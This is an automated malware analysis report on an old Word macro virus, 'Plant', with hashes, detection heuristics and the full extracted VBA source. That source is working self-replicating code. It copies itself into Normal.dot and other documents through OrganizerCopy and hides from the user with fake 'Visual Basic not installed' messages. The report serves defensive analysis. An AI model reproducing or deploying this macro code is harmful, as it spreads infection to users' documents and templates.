Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f133e748348b9441…

MALICIOUS

Office (OLE)

41.5 KB Created: 2004-04-08 12:28:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-21
MD5: 26e2a265d0b8bc99ecdb5c9e6215e93b SHA-1: 92a07f8316476e2a60fa7cb44bcffe820d405e89 SHA-256: f133e748348b9441aba36797a0e582ee9f912d803a6a8a3b8a5cf5a58dcff498
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains legacy WordBasic and VBA macros, including AutoOpen and AutoExec functions, which are indicative of malicious intent. The AutoOpen macro attempts to copy itself and potentially a payload named 'Plant.doc' to program directories, and the AutoExec macro displays a message indicating infection by 'Plant.Virus'. The VBA code also attempts to tamper with itself by writing VBA project code, suggesting self-replication or anti-analysis techniques.

Heuristics 6

  • ClamAV: Doc.Trojan.Plant-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Plant-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Application.OrganizerCopy _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2785 bytes
SHA-256: 086c185711248e78bf56f83180349017291e80419ee2ec32fae60c1fe4d3e192
Detection
ClamAV: Doc.Trojan.Plant-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "FServPlant"
'
' Please, don't delete it, if you are not sure.
'

Sub AutoExec()
    On Error GoTo ErrorInSub
    CommandBars("Visual Basic").Enabled = False
    If DateTime.Day(DateTime.Date) = 1 _
    And DateTime.Month(DateTime.Date) = 1 Then MsgBox _
    prompt:="Happy NewYear ! You are infected by Plant.Virus. " + _
    "Don't panic, i'm KILL you.", _
    buttons:=vbExclamation, _
    Title:="Plant Information"
ErrorInSub:
End Sub
Sub AutoOpen()
    fName = ActiveDocument.Name
    fFullName = ActiveDocument.FullName
    nPath = Options.DefaultFilePath(wdUserTemplatesPath)
    sPath = Options.DefaultFilePath(wdProgramPath)
    
    On Error GoTo ErrorInSub
    If FileSystem.Dir(sPath + "\Plant.doc", vbNormal) = _
    "Plant.doc" Then GoTo FindMainFile
    ActiveDocument.SaveAs FileName:=sPath + "\" + fName
    ActiveDocument.SaveAs FileName:=fFullName
    Name sPath + "\" + fName As sPath + "\Plant.doc"
    AutoExec
FindMainFile:
    CopyMacros nSource:=fFullName, nDestination:=nPath + "\Normal.dot"
ErrorInSub:
End Sub
Sub FileOpen()
    On Error GoTo ErrorInSub
    Dialogs(wdDialogFileOpen).Show
ErrorInSub:
End Sub
Sub AutoClose()
    fFullName = ActiveDocument.FullName
    sPath = Options.DefaultFilePath(wdProgramPath)

    On Error GoTo ErrorInSub
    CopyMacros nSource:=sPath + "\Plant.doc", nDestination:=fFullName
ErrorInSub:
End Sub
Sub ViewVBCode()
    On Error GoTo ErrorInSub
    VBNotToday
ErrorInSub:
End Sub
Sub ToolsMacro()
    On Error GoTo ErrorInSub
    VBNotToday
ErrorInSub:
End Sub
Sub Organizer()
    On Error GoTo ErrorInSub
    VBNotToday
ErrorInSub:
End Sub
Sub ToolsRecordMacroStart()
    On Error GoTo ErrorInSub
    VBNotToday
ErrorInSub:
End Sub
Sub ToolsRecordMacroToggle()
    On Error GoTo ErrorInSub
    VBNotToday
ErrorInSub:
End Sub
Private Sub CopyMacros(nSource, nDestination)
    On Error GoTo ErrorInSub
    Application.OrganizerCopy _
    Source:=nSource, _
    Destination:=nDestination, _
    Name:="FServPlant", _
    Object:=wdOrganizerObjectProjectItems
ErrorInSub:
End Sub
Private Sub VBNotToday()
    On Error GoTo ErrorInSub
    MsgBox _
    prompt:="Microsoft Visual Basic is not installed. " + _
    "Please refer to the online help or documentation of the " + _
    "host application to determine how to install " + _
    "Microsoft Visual Basic.", _
    buttons:=vbExclamation, Title:="Microsoft Visual Basic"
ErrorInSub:
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.